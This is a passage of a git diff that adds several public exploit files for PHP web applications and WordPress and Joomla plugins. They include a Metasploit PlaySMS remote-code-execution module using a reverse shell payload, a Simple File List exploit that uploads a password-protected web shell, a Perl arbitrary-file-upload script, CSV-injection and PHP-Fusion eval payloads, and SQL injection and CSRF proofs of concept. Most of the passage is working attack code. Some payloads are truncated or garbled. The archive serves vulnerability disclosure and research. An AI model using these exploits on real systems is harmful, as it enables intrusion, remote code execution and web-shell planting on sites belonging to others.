,now you see the execution of xss code ,then refersh +frontend page site -> "http://target/shop/ " or frontend pages used this +plugin the execution of xss code. + +Demo Poc: + +http://target/wp-admin/admin.php?page=wc-settings&tab=woof + +now in tab "design" -> then enter ( "; + + +.:: Post Request ::. +option_page=wp-sitemap-page&action=update&_wpnonce=de5e7c2417&_wp_http_referer=%2Fwp%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp_sitemap_page%26settings-updated%3Dtrue&wsp_posts_by_category=&wsp_exclude_pages=%27%3E%22%3E%3Cscript%3Ealert%28%2FXSS+By+UltraSecurity%2F%29%3C%2Fscript%3E&wsp_exclude_cpt_archive=1&wsp_exclude_cpt_author=1&submit=Save+Changes \ No newline at end of file diff --git a/exploits/php/webapps/48198.txt b/exploits/php/webapps/48198.txt new file mode 100644 index 000000000..9b03087d5 --- /dev/null +++ b/exploits/php/webapps/48198.txt @@ -0,0 +1,43 @@ +#!/usr/bin/python3 + +# Exploit Title: Joomla 3.9.0 < 3.9.7 - CSV Injection +# Date: 2020-03-10 +# Vulnerability Authors: Jose Antonio Rodriguez Garcia and Phil Keeble (MWR InfoSecurity) +# Exploit Author: Abdullah - @i4bdullah +# Vendor Homepage: https://www.joomla.org/ +# Software Link: https://downloads.joomla.org/cms/joomla3/3-9-5/Joomla_3-9-5-Stable-Full_Package.zip?format=zip +# Version: 3.9.0 < 3.9.7 +# Tested on: Ubuntu 18.04 LTS and Windows 7 +# CVE : CVE-2019-12765 + +import mechanize +import sys + +if (len(sys.argv) != 2): + print(f'Usage: {sys.argv[0]} ') + print(f'Example: {sys.argv[0]} http://127.0.0.1 ') + sys.exit(1) + +base_url = sys.argv[1] +reg_url = f"{base_url}/joomla/index.php/component/users/?view=registration&Itemid=101" +login_url = f"{base_url}/joomla/index.php?option=com_users" + +def pwn(username='abdullah'): + payload = "=cmd|'/c calc.exe'!A1" + print(f"Registering a new user with the name <{payload}>...") + reg_form = mechanize.Browser() + reg_form.set_handle_robots(False) + reg_form.open(reg_url) + reg_form.select_form(nr=0) + reg_form.form['jform[name]'] = payload + reg_form.form['jform[username]'] = username + reg_form.form['jform[password1]'] = 'password' + reg_form.form['jform[password2]'] = 'password' + reg_form.form['jform[email1]'] = 'whatever@i4bdullah.com' + reg_form.form['jform[email2]'] = 'whatever@i4bdullah.com' + reg_form.submit() + print("The exploit ran successfully.") + print("Exiting...") + sys.exit(0) + +pwn() \ No newline at end of file diff --git a/exploits/php/webapps/48199.txt b/exploits/php/webapps/48199.txt new file mode 100644 index 000000000..30288fce2 --- /dev/null +++ b/exploits/php/webapps/48199.txt @@ -0,0 +1,189 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'PlaySMS 1.4.3 Pre Auth Template Injection Remote Code +Execution', + 'Description' => %q{ + This module exploits a Preauth Server-Side Template Injection +leads remote code execution vulnerability in PlaySMS Before Version 1.4.3. + This issue is caused by Double processes a server-side template +by Custom PHP Template system called 'TPL'. + which is used in PlaySMS template engine location +src/Playsms/Tpl.php:_compile(). When Attacker supply username with a +malicious payload + and submit. This malicious payload first process by TPL and +save the value in the current template after this value goes for the second +process + which result in code execution. + The TPL(https://github.com/antonraharja/tpl) template language +is vulnerable to PHP code injection. + + This module was tested against PlaySMS 1.4 on HackTheBox's +Forlic Machine. + }, + 'Author' => + [ + 'Touhid M.Shaikh ', # Metasploit +Module + 'Lucas Rosevear' # Found and Initial PoC by NCC Groupd + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE','2020-8644'], + ['URL',' +https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/ +'] + ], + 'DefaultOptions' => + { + 'SSL' => false, + 'PAYLOAD' => 'cmd/unix/reverse_python' + }, + 'Privileged' => false, + 'Platform' => %w[unix linux], + 'Arch' => ARCH_CMD, + 'Payload' => + { + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'python' + } + }, + 'Targets' => + [ + [ 'PlaySMS Before 1.4.3', { } ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Feb 05 2020')) + + register_options( + [ + OptString.new('TARGETURI', [ true, "Base playsms directory path", +'/']), + ]) + end + + def uri + return target_uri.path + end + + def check + begin + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(uri, 'index.php') + }) + rescue + vprint_error('Unable to access the index.php file') + return CheckCode::Unknown + end + + if res.code == 302 && +res.headers['Location'].include?('index.php?app=main&inc=core_auth&route=login') + return Exploit::CheckCode::Appears + end + + return CheckCode::Safe + end + + #Send Payload in Login Request + def login + res = send_request_cgi({ + 'uri' => normalize_uri(uri, 'index.php'), + 'method' => 'GET', + 'vars_get' => { + 'app' => 'main', + 'inc' => 'core_auth', + 'route' => 'login', + } + }) + + # Grabbing CSRF token from body + /name="X-CSRF-Token" value="(?[a-z0-9"]+)">/ =~ res.body + fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine +CSRF token") if csrf.nil? + vprint_good("X-CSRF-Token for login : #{csrf}") + + cookies = res.get_cookies + + vprint_status('Trying to Send Payload in Username Field ......') + + #Encoded in base64 to avoid HTML TAGS which is filter by Application. + evil = "{{`printf #{Rex::Text.encode_base64(payload.encode)}|base64 +-d |sh`}}" + + # Send Payload with cookies. + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(uri, 'index.php'), + 'cookie' => cookies, + 'vars_get' => Hash[{ + 'app' => 'main', + 'inc' => 'core_auth', + 'route' => 'login', + 'op' => 'login', + }.to_a.shuffle], + 'vars_post' => Hash[{ + 'X-CSRF-Token' => csrf, + 'username' => evil, + 'password' => '' + }.to_a.shuffle], + }) + + fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to +Login request") if res.nil? + + # Request Status Check + if res.code == 302 + print_good("Payload successfully Sent") + return cookies + else + fail_with(Failure::UnexpectedReply, "#{peer} - Something Goes +Wrong") + end + end + + def exploit + cookies = login + vprint_status("Cookies here : #{cookies}") + # Execute Last Sent Username. + res = send_request_cgi({ + 'uri' => normalize_uri(uri, 'index.php'), + 'method' => 'GET', + 'cookie' => cookies, + 'vars_get' => { + 'app' => 'main', + 'inc' => 'core_auth', + 'route' => 'login', + } + }) + end +end + +-- +Touhid Shaikh +Exploit Researcher and Developer | Security Consultant +m: +91 7738794435 +e: touhidshaikh22@gmail.com +www.touhidshaikh.com [image: Facebook icon] + [image: LinkedIn icon] + [image: Twitter icon] + [image: Youtube icon] + + +The content of this email is confidential and intended for the recipient +specified in message only. It is strictly forbidden to share any part of +this message with any third party, without a written consent of the sender. +If you received this message by mistake, please reply to this message and +follow with its deletion, so that we can ensure such a mistake does not +occur in the future. \ No newline at end of file diff --git a/exploits/php/webapps/48200.txt b/exploits/php/webapps/48200.txt new file mode 100644 index 000000000..be798f8ef --- /dev/null +++ b/exploits/php/webapps/48200.txt @@ -0,0 +1,319 @@ +# Exploit Title: Wing FTP Server 6.2.3 - Privilege Escalation +# Date: 2020-03-10 +# Exploit Author: Dhiraj Mishra +# Vendor Homepage: https://www.wftpserver.com +# Version: v6.2.6 +# Tested on: Windows 10 + +*Summary:* +An authenticated CSRF exists in web client and web administration of Wing +FTP v6.2.6, a crafted HTML page could delete admin user from the +application where as administration needs to re-install the program and add +admin user again. Issue was patched in v6.2.7. + +*Proof of concept:* + + + +
+ + + +
+ + + +*Patch (lua/cgiadmin.lua):* +URL: https://www.wftpserver.com/serverhistory.htm + +local outfunc = "echo" + +local function out (s, i, f) +s = string.sub(s, i, f or -1) +if s == "" then return s end +s = string.gsub(s, "([\\\n\'])", "\\%1") +s = string.gsub(s, "\r", "\\r") +return string.format(" %s('%s'); ", outfunc, s) +end + +local function translate (s) +s = string.gsub(s, "<%%(.-)%%>", "") +local res = {} +local start = 1 +while true do +local ip, fp, target, exp, code = string.find(s, "<%?%?(%w*)[ +\t]*(=?)(.-)%?%?>", start) +if not ip then break end +table.insert(res, out(s, start, ip-1)) +if target ~= "" and target ~= "lua" then +table.insert(res, out(s, ip, fp)) +else +if exp == "=" then +table.insert(res, string.format(" %s(%s);", outfunc, code)) +else +table.insert(res, string.format(" %s ", code)) +end +end +start = fp + 1 +end +table.insert(res, out(s, start)) +return table.concat(res) +end + +local function compile (src, chunkname) +return loadstring(translate(src),chunkname) +end + +function include (filename, env) +if incfiles[filename] == nil then +incfiles[filename] = true; +path = c_GetAppPath() +path = path .. "/webadmin/"..filename +local errstr = string.format("The page '%s' does not +exist!",filename) +local fh,_ = io.open (path) +if not fh then +echo_out = echo_out..errstr +return +end +local src = fh:read("*a") +fh:close() +local prog = compile(src, path) + +local _env +if env then +_env = getfenv (prog) +setfenv (prog, env) +end + +local status,err = pcall(prog) +if not status then +if type(err) == "string" and not string.find(err,"exit function!") then +print(string.format("some error in %s!",err)) +end +return +end +end +end + +function var_dump(var) +print("{") +if type(var) == "string" or type(var) == "number" or type(var) == "boolean" +or type(var) == "function" then +print(var) +elseif(type(var) == "thread") then +print("thread") +elseif(type(var) == "userdata") then +print("userdata") +elseif type(var) == "nil" then +print("nil") +elseif type(var) == "table" then +for k,v in pairs(var) do +if type(k) == "string" then k="'"..k.."'" end +if(type(v) == "string") then +print(k.."=>'"..v.."',") +elseif(type(v) == "number" or type(v) == "boolean") then +print(k.."=>"..tostring(v)..",") +elseif(type(v) == "function") then +print(k.."=>function,") +elseif(type(v) == "thread") then +print(k.."=>thread,") +elseif(type(v) == "userdata") then +print(k.."=>userdata,") +elseif(type(v) == "nil") then +print(k.."=>nil,") +elseif(type(v) == "table") then +print(k.."=>table,") +else +print(k.."=>object,") +end +end +else +print("object") +end +print("}") +end + +function init_get() +local MatchedReferer = true +if _SESSION_ID ~= nil then +local Referer = string.match(strHead,"[rR]eferer:%s?%s([^\r\n]*)") +if Referer ~= nil and Referer ~= "" then +local Host = string.match(strHead,"[hH]ost:%s?%s([^\r\n]*)") +if Host ~= nil and Host ~= "" then +if string.sub(Referer,8,string.len(Host)+7) == Host or +string.sub(Referer,9,string.len(Host)+8) == Host then +MatchedReferer = true +else +MatchedReferer = false +exit() +end +end +else +MatchedReferer = false +end +end + +string.gsub (urlparam, "([^&=]+)=([^&=]*)&?", +function (key, val) +if key == "domain" then +if MatchedReferer == true then +rawset(_GET,key,val) +else +rawset(_GET,key,specialhtml_encode(val)) +end +else +if MatchedReferer == true then +rawset(_GET,unescape(key),unescape(val)) +else +--rawset(_GET,unescape(key),specialhtml_encode(unescape(val))) +end +end +end +) +end + +function init_post() +local MatchedReferer = true +if _SESSION_ID ~= nil then +local Referer = string.match(strHead,"[rR]eferer:%s?%s([^\r\n]*)") +if Referer ~= nil and Referer ~= "" then +local Host = string.match(strHead,"[hH]ost:%s?%s([^\r\n]*)") +if Host ~= nil and Host ~= "" then +if string.sub(Referer,8,string.len(Host)+7) == Host or +string.sub(Referer,9,string.len(Host)+8) == Host then +MatchedReferer = true +else +MatchedReferer = false +exit() +end +end +else +MatchedReferer = false +end +end + +if +string.find(strHead,"[cC]ontent%-[tT]ype:%s?multipart/form%-data;%s?boundary=") +then +string.gsub (strContent, +"[cC]ontent%-[dD]isposition:%s?form%-data;%s?name=\"([^\"\r\n]*)\"\r\n\r\n([^\r\n]*)\r\n", +function (key, val) +if key == "domain" then +if MatchedReferer == true then +rawset(_POST,key,val) +else +rawset(_POST,key,specialhtml_encode(val)) +end +else +if MatchedReferer == true then +rawset(_POST,unescape(key),unescape(val)) +else +--rawset(_POST,unescape(key),specialhtml_encode(unescape(val))) +end +end +end +) +else +string.gsub (strContent, "([^&=\r\n]+)=([^&=\r\n]*)&?", +function (key, val) +if key == "domain" then +if MatchedReferer == true then +rawset(_POST,key,val) +else +rawset(_POST,key,specialhtml_encode(val)) +end +else +if MatchedReferer == true then +rawset(_POST,unescape(key),unescape(val)) +else +--rawset(_POST,unescape(key),specialhtml_encode(unescape(val))) +end +end +end +) +end +end + +function init_session() +if _COOKIE["UIDADMIN"] ~= nil then +_SESSION_ID = _COOKIE["UIDADMIN"] +SessionModule.load(_SESSION_ID) +end +end + +function init_cookie() +local cookiestr = string.match(strHead,"[cC]ookie:%s?(%s[^\r\n]*)") +if cookiestr == nil or cookiestr == "" then return end +string.gsub (cookiestr, "([^%s;=]+)=([^;=]*)[;%s]?", +function (key, val) +rawset(_COOKIE,unescape(key),unescape(val)) +end +) +end + +function setcookie(name,value,expire_secs) +if name == "UIDADMIN" then return end +local expiretime = os.date("!%A, %d-%b-%Y %H:%M:%S GMT", +os.time()+3600*24*365) +_SETCOOKIE = _SETCOOKIE.."Set-Cookie: "..name.."="..value.."; +expires="..expiretime.."\r\n" +rawset(_COOKIE,name,value) +end + +function getcookie(name) +if name == "UIDADMIN" then return end +return _COOKIE[name] +end + +function deletecookie(name) +setcookie(name,"",-10000000) +end + +function deleteallcookies() +for name,_ in pairs(_COOKIE) do +deletecookie(name) +end +end + +local cookie_metatable = +{ +__newindex = function(t,k,v) +setcookie(k,v,360000) +end +} +setmetatable(_COOKIE,cookie_metatable) + +session_metatable = +{ +__newindex = function(t,k,v) +if type(v) ~= "table" then +if k ~= nil then +k = string.gsub(k,"'","") +k = string.gsub(k,"\"","") +end +if v ~= nil then +--v = string.gsub(v,"%[","") +--v = string.gsub(v,"%]","") +end +rawset(_SESSION,k,v) +SessionModule.save(_SESSION_ID) +end +end +} +--setmetatable(_SESSION,session_metatable) + +function init_all() +init_cookie() +init_session() +init_get() +init_post() +end + +function setContentType(typestr) +_CONTENTTYPE = typestr +end + +function exit() +error("exit function!") +end \ No newline at end of file diff --git a/exploits/php/webapps/48213.txt b/exploits/php/webapps/48213.txt new file mode 100644 index 000000000..f290e7347 --- /dev/null +++ b/exploits/php/webapps/48213.txt @@ -0,0 +1,23 @@ +# Exploit Title: Wordpress Plugin Custom Searchable Data System - +Unauthenticated Data modification +# Date: 13 March 2020 +# Exploit Author: Nawaf Alkeraithe +# Vendor Homepage: +https://wordpress.org/plugins/custom-searchable-data-entry-system/ +# Software Link: +https://wordpress.org/plugins/custom-searchable-data-entry-system/ +# Version: 1.7.1 + +Plugin fails to perform authorization check to delete/add/edit data entries. + +PoC (delete entry): +GET /wordpress/wp-admin/admin.php?page=sds-form-entries&sds-del-entry-first-entry-id=[ENTRY +ID1]&sds-del-entry-last-entry-id=[ENTRY +ID2]&sds-del-entry-table-row=wp_ghazale_sds_newtest_inputs + +Note: plugin is not maintained now, either remove it, or apply the +authorization check to all actions. + +Special thanks to *Wordfence and Sean Murphy! +(https://www.wordfence.com/blog/2020/03/active-attack-on-zero-day-in-custom-searchable-data-entry-system-plugin/ +)* \ No newline at end of file diff --git a/exploits/php/webapps/48222.txt b/exploits/php/webapps/48222.txt new file mode 100644 index 000000000..a3a00b1a0 --- /dev/null +++ b/exploits/php/webapps/48222.txt @@ -0,0 +1,32 @@ +# Exploit Title: UADMIN Botnet 1.0 - 'link' SQL Injection +# Google Dork: n/a +# Date: 2020-03-16 +# Exploit Author: n4pst3r +# Vendor Homepage: unkn0wn +# Software Link: unkn0wn +# Version: unkn0wn +# Tested on: Windows 10, Kali +# CVE : n/a +################################ +# Vuln-Code: download.php + +$link=$_GET['link']; +$agent=esc__($_SERVER['HTTP_USER_AGENT']); + +if(isset($_GET['botid'])){ + $botid=esc__($_GET['botid']); +}else{ + $botid='unknown'; +}; + +################################ +Attack Response & PoC: + +--- +Parameter: link (GET) + Type: time-based blind + Title: SQLite > 2.0 OR time-based blind (heavy query) + Payload: link=1' OR 7990=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))-- nwGY +--- + +http://127.0.0.1/ush/gates/token.php?link=1 \ No newline at end of file diff --git a/exploits/php/webapps/48230.txt b/exploits/php/webapps/48230.txt new file mode 100644 index 000000000..a3569d988 --- /dev/null +++ b/exploits/php/webapps/48230.txt @@ -0,0 +1,191 @@ +# Exploit Title: Joomla! ACYMAILING 3.9.0 component - Unauthenticated Arbitrary File Upload +# Google Dork: inurl:"index.php?option=com_acym" +# Date: 2020-03-16 +# Exploit Author: qw3rTyTy +# Vendor Homepage: https://www.acyba.com/ +# Software Link: https://www.acyba.com/acymailing/download.html +# Version: v6.9.1 Starter +# Tested on: Joomla! v3.9.0 +# CVE: N/A + + +######################################################################################## +#Analysis of vulnerability +######################################################################################## +Vulnerable code is in MailsController::setNewIconShare() in file "back/controllers/mails.php". + +[BEGIN_CODE] + 600 public function setNewIconShare() + 601 { + 602 $socialName = acym_getVar('string', 'social', ''); + 603 $extension = pathinfo($_FILES['file']['name']); + 604 $newPath = ACYM_UPLOAD_FOLDER.'socials'.DS.$socialName; + 605 $newPathComplete = $newPath.'.'.$extension['extension']; + 606 //There code is no checking CSRF token, no sanitizing, and authentication. + 607 if (!acym_uploadFile($_FILES['file']['tmp_name'], ACYM_ROOT.$newPathComplete) || empty($socialName)) { //!!! + 608 echo 'error'; + 609 exit; + 610 } + 611 + 612 $newConfig = new stdClass(); + 613 $newConfig->social_icons = json_decode($this->config->get('social_icons', '{}'), true); + 614 + 615 $newImg = acym_rootURI().$newPathComplete; + 616 $newImgWithoutExtension = acym_rootURI().$newPath; + 617 + 618 $newConfig->social_icons[$socialName] = $newImg; + 619 $newConfig->social_icons = json_encode($newConfig->social_icons); + 620 $this->config->save($newConfig); + 621 + 622 echo json_encode( + 623 [ + 624 'url' => $newImgWithoutExtension, + 625 'extension' => $extension['extension'], + 626 ] + 627 ); + 628 exit; + 629 } + +function acym_uploadFile($src, $dest) +{ + $dest = acym_cleanPath($dest); + + $baseDir = dirname($dest); + if (!file_exists($baseDir)) { + acym_createFolder($baseDir); + } + + if (is_writeable($baseDir) && move_uploaded_file($src, $dest)) {//!!! + if (@chmod($dest, octdec('0644'))) { + return true; + } else { + acym_enqueueMessage(acym_translation('ACYM_FILE_REJECTED_SAFETY_REASON'), 'error'); + } + } else { + acym_enqueueMessage(acym_translation_sprintf('ACYM_COULD_NOT_UPLOAD_FILE_PERMISSION', $baseDir), 'error'); + } + + return false; +} +[END_CODE] + +######################################################################################## +#Exploit +######################################################################################## +#!/usr/bin/perl +# +#$> perl ./exploit.pl "http://127.0.0.1/joomla" "lolz" /tmp/lolz.php +use strict; +use warnings; +use LWP::UserAgent; +use JSON(qw/decode_json/); +######################################################################################## +sub print_usage_and_exit +{ + print("*** com_acym Arbitrary File Upload exploit\n"); + print("Usage: $0 \n"); + print("\n"); + + exit(); +} + +sub fetch_useragent +{ + my @available_useragents = ( + "gertrud barkhorn", + "erica hartmann", + "eila ilmatar juutilainen", + ); + + return($available_useragents[(rand(scalar(@available_useragents)))]); +} + +sub is_valid_url +{ + my $given_url = shift(@_); + + return 1 if ( $given_url =~ /^http(s)?:\/\// ); + return 0; +} + +sub do_die +{ + my $errmsg = shift(@_); + + printf("[!] %s\n", $errmsg); + exit(); +} + +sub get_base_path +{ + return(sprintf("%s/index.php", $_[0])); +} + +sub do_exploit +{ + my %params = %{ shift(@_); }; + my $ua = LWP::UserAgent->new( + "agent" => $params{"useragent"}, + "timeout" => 360 + ); + + print("[+] Trying to exploit ...\n"); + print("[*] Sending POST request ...\n"); + my $response = $ua->post( + get_base_path($params{"url"}), + "Content-Type" => "form-data", + "Accept-Language" => "zh-cn", + "Content" => { + "option" => "com_acym", + "ctrl" => "frontmails", + "task" => "setNewIconShare", + "social" => $params{"path"}, + "file" => [ $params{"file"} ], + }, + ); + + if ( $response->code == 200 ) + { + my $j = decode_json($response->decoded_content); + my $f = sprintf("%s.%s", + $j->{"url"}, $j->{"extension"}); + my $response = $ua->head($f); + + printf("[\$] Uploaded file in %s\n", $f) if ( $response->code == 200 ); + } +} + +sub main +{ + print_usage_and_exit() if ( scalar(@ARGV) < 2 ); + + my %params = ( + "url" => $ARGV[0], + "path" => $ARGV[1], + "file" => $ARGV[2], + "useragent" => fetch_useragent()); + + do_die("Given invalid URL.") if ( !is_valid_url($ARGV[0]) ); + do_die("Given invalid File.") if ( (!-e $ARGV[2]) or (stat($ARGV[2]))[7] == 0); + printf("[*] Parameters:\n"); + + while ( my ($k, $v) = each(%params) ) { printf("[+] %s => %s\n", $k, $v); } + printf("*" x50 . "\n"); + + while ( 1 ) + { + printf("[?] Proceed(y/n)> "); + + my $c = ; + chomp($c); + + if ( (length($c) == 1) and lc($c) eq "y" ) + { + do_exploit(\%params); + last; + } + } +} + +main(); +######################################################################################## \ No newline at end of file diff --git a/exploits/php/webapps/48238.txt b/exploits/php/webapps/48238.txt new file mode 100644 index 000000000..d42cf6122 --- /dev/null +++ b/exploits/php/webapps/48238.txt @@ -0,0 +1,39 @@ +* Exploit Title: Wordpress Plugin PicUploader 1.0 - Remote File Upload +* Google Dork: N/A +* Date: 2020.03.22 +* Exploit Author: Milad Karimi +* Vendor Homepage: https://github.com/xiebruce/PicUploader +* Software Link: https://github.com/xiebruce/PicUploader +* Category : webapps +* Version: 1.0 +* Tested on: windows 10 , firefox +* CVE : N/A + +Vulnerable Source: +    88: move_uploaded_file move_uploaded_file($tmp_name, $dest)) +    86: foreach($files['tmp_name'] as $key=>$tmp_name) +    80: $files = $_FILES['file']){ +    72: $_FILES['file'] = $_FILES[$plugin];  // if(isset($_FILES)), +    87: $dest = $tmpDir . '/' . $files['name'][$key]; +    81: $tmpDir = APP_PATH . '/.tmp'; +    24: define('APP_PATH', strtr(__DIR__, '\\', '/'));  // define() +    80: $files = $_FILES['file']){ +    72: $_FILES['file'] = $_FILES[$plugin];  // if(isset($_FILES)), +    80: if(isset($_FILES['file']) && $files = $_FILES['file']) +    84: if(is_array($files['tmp_name'])) + +Exploit: +"@$shahab")); +curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); +$result = curl_exec($ch); +curl_close($ch); +print "$result"; +?> + +Location File: +http://localhost/wordpress/wp-content/plugins/PicUploader/file.jpg \ No newline at end of file diff --git a/exploits/php/webapps/48278.txt b/exploits/php/webapps/48278.txt new file mode 100644 index 000000000..a14e27435 --- /dev/null +++ b/exploits/php/webapps/48278.txt @@ -0,0 +1,60 @@ +# Exploit Title: PHP-Fusion 9.03.50 - 'panels.php' Multiple vulnerability +# Google Dork: N/A=20 +# Date: 2020-04-01 +# Exploit Author: Unkn0wn +# Vendor Homepage: https://www.php-fusion.co.uk +# Software Link: https://www.php-fusion.co.uk/php_fusion_9_downloads.php +# Version: 9.03.50 +# Tested on: Ubuntu +# CVE : N/A +--------------------------------------------------------- +Code Execution: +This vulnerabilty in "add_panel_form()" function. +in line 527 we can see "eval" tag: +* +eval("?>".stripslashes($_POST['panel_content'])."".nl2br(parse_textarea($_POST['panel_content'], FALSE, FALSE))."\n"; +" + +Demo: +http://localhost/PHP-Fusion/files/administration/panels.php?aid=3Dae28e84e2= +2e900fb§ion=3Dpanelform&action=3Dedit&panel_id=3D4 + +POST DATA: +fusion_token=3D1-1585668386-30dc735031f57e89268287bb176e78b092e156dd32a583c= +f191c7dd30c2d99e9&form_id=3Dpanel_form&fusion_PmbaJ2=3D&panel_id=3D4&panel_= +name=3DWelcome Message&panel_filename=3Dnone&panel_side=3D2&panel_restricti= +on=3D2&panel_url_list=3D&panel_display=3D0&panel_content-insertimage=3D&pan= +el_content=3D;""&panel_access=3D0&panel_la= +nguages[]=3DEnglish&panel_save=3DPreview Panel + +---------------------------------------------------------- +# Contact : 0x9a@tuta.io +# Visit: https://t.me/l314XK205E +# @ 2010 - 2020 +# Underground Researcher \ No newline at end of file diff --git a/exploits/php/webapps/48307.txt b/exploits/php/webapps/48307.txt new file mode 100644 index 000000000..63f9ea41b --- /dev/null +++ b/exploits/php/webapps/48307.txt @@ -0,0 +1,30 @@ +Title: Helpful 2.4.11 Sql Injection - Wordpress Plugin +Version : 2.4.11 +Software Link : https://wordpress.org/plugins/helpful/ +Date of found: 10.04.2019 +Author: Numan Türle + + +core/Core.class.php +// Ajax requests: pro +add_action( 'wp_ajax_helpful_ajax_pro', array( $this, 'helpful_ajax_pro' ) ); + +// set args for insert command +$args = array( +'post_id' => $_REQUEST['post_id'], +'user' => $_REQUEST['user'], +'pro' => $_REQUEST['pro'], +'contra' => $_REQUEST['contra'] +); +$result = $this->insert( $args ); + +@params = 'post_id' => $_REQUEST['post_id'], +call function insert --> + +if( !$args['post_id'] ) return false; +$check = $wpdb->get_results("SELECT post_id,user FROM $table_name WHERE user = '$user' AND post_id = $post_id"); + + + +Payload : +GET /wp-admin/admin-ajax.php?action=helpful_ajax_pro&contra=0&post_id=if(1=1,sleep(10),0)&pro=1&user=1 \ No newline at end of file diff --git a/exploits/php/webapps/48347.txt b/exploits/php/webapps/48347.txt new file mode 100644 index 000000000..b8499915c --- /dev/null +++ b/exploits/php/webapps/48347.txt @@ -0,0 +1,121 @@ + + + + + + + + +

This is totally a legit page. Just keep reading this for a minute :)

+ + + + + \ No newline at end of file diff --git a/exploits/php/webapps/48349.py b/exploits/php/webapps/48349.py new file mode 100755 index 000000000..97aa87f96 --- /dev/null +++ b/exploits/php/webapps/48349.py @@ -0,0 +1,95 @@ +# Exploit Title: Wordpress Plugin Simple File List 5.4 - Remote Code Execution +# Date: 2020-04-2019 +# Exploit Author: coiffeur +# Vendor Homepage: https://simplefilelist.com/ +# Software Link: https://wordpress.org/plugins/simple-file-list/ +# Version: Wordpress v5.4 Simple File List v4.2.2 + +import requests +import random +import hashlib +import sys +import os +import urllib3 +urllib3.disable_warnings() + +dir_path = '/wp-content/uploads/simple-file-list/' +upload_path = '/wp-content/plugins/simple-file-list/ee-upload-engine.php' +move_path = '/wp-content/plugins/simple-file-list/ee-file-engine.php' + + +def usage(): + banner = """ +NAME: Wordpress v5.4 Simple File List v4.2.2, pre-auth RCE +SYNOPSIS: python wp_simple_file_list_4.2.2.py +AUTHOR: coiffeur + """ + print(banner) + + +def generate(): + filename = f'{random.randint(0, 10000)}.png' + password = hashlib.md5(bytearray(random.getrandbits(8) + for _ in range(20))).hexdigest() + with open(f'{filename}', 'wb') as f: + payload = '404 Not Found

Not Found

";}?>' + f.write(payload.encode()) + print(f'[ ] File {filename} generated with password: {password}') + return filename, password + + +def upload(url, filename): + files = {'file': (filename, open(filename, 'rb'), 'image/png')} + datas = {'eeSFL_ID': 1, 'eeSFL_FileUploadDir': dir_path, + 'eeSFL_Timestamp': 1587258885, 'eeSFL_Token': 'ba288252629a5399759b6fde1e205bc2'} + r = requests.post(url=f'{url}{upload_path}', + data=datas, files=files, verify=False) + r = requests.get(url=f'{url}{dir_path}{filename}', verify=False) + if r.status_code == 200: + print(f'[ ] File uploaded at {url}{dir_path}{filename}') + os.remove(filename) + else: + print(f'[*] Failed to upload {filename}') + exit(-1) + return filename + + +def move(url, filename): + new_filename = f'{filename.split(".")[0]}.php' + headers = {'Referer': f'{url}/wp-admin/admin.php?page=ee-simple-file-list&tab=file_list&eeListID=1', + 'X-Requested-With': 'XMLHttpRequest'} + datas = {'eeSFL_ID': 1, 'eeFileOld': filename, + 'eeListFolder': '/', 'eeFileAction': f'Rename|{new_filename}'} + r = requests.post(url=f'{url}{move_path}', + data=datas, headers=headers, verify=False) + if r.status_code == 200: + print(f'[ ] File moved to {url}{dir_path}{new_filename}') + else: + print(f'[*] Failed to move {filename}') + exit(-1) + return new_filename + + +def main(url): + file_to_upload, password = generate() + uploaded_file = upload(url, file_to_upload) + moved_file = move(url, uploaded_file) + if moved_file: + print(f'[+] Exploit seem to work.\n[*] Confirmning ...') + + datas = {'password': password, 'cmd': 'phpinfo();'} + r = requests.post(url=f'{url}{dir_path}{moved_file}', + data=datas, verify=False) + if r.status_code == 200 and r.text.find('php') != -1: + print('[+] Exploit work !') + print(f'\tURL: {url}{dir_path}{moved_file}') + print(f'\tPassword: {password}') + + +if __name__ == "__main__": + if (len(sys.argv) < 2): + usage() + exit(-1) + + main(sys.argv[1]) \ No newline at end of file diff --git a/exploits/php/webapps/48374.txt b/exploits/php/webapps/48374.txt new file mode 100644 index 000000000..844163df5 --- /dev/null +++ b/exploits/php/webapps/48374.txt @@ -0,0 +1,49 @@ +# Exploit Title: Library CMS Powerful Book Management System 2.2.0 - Session Fixation +# Date: 2020-04-22 +# Exploit Author: Ismail Tasdelen +# Vendor Homepage: https://kaasoft.pro/ +# Software : https://codecanyon.net/item/library-cms-powerful-book-management-system/21105281 +# Product Version: v2.2.0 +# Product : Library CMS +# Vulernability Type : Broken Authentication +# Vulenrability : Session Fixation +# CVE : N/A + +# Description : + +Session Fixation vulnerability has been discovered in v2.2.0 +version of Library CMS Powerful Book Management System. + +Admin HTTP Request : + +POST /admin/login HTTP/1.1 +Host: XXX.XXX.XXX.XXX +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://XXX.XXX.XXX.XXX/admin/login +Content-Type: application/x-www-form-urlencoded +Content-Length: 49 +Connection: close +Cookie: activeLanguage=en_US; PHPSESSID=nfj6gk1murk6jq47lpk5cv7qq6; activeLanguage=en_US; _ym_uid=1579299191562269050; _ym_d=1579299191; _ym_visorc_46947615=w; _ym_isad=2 +Upgrade-Insecure-Requests: 1 + +login=USERNAME&password=PASSWORD + +Member HTTP Request : + +POST /admin/login HTTP/1.1 +Host: XXX.XXX.XXX.XXX +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: 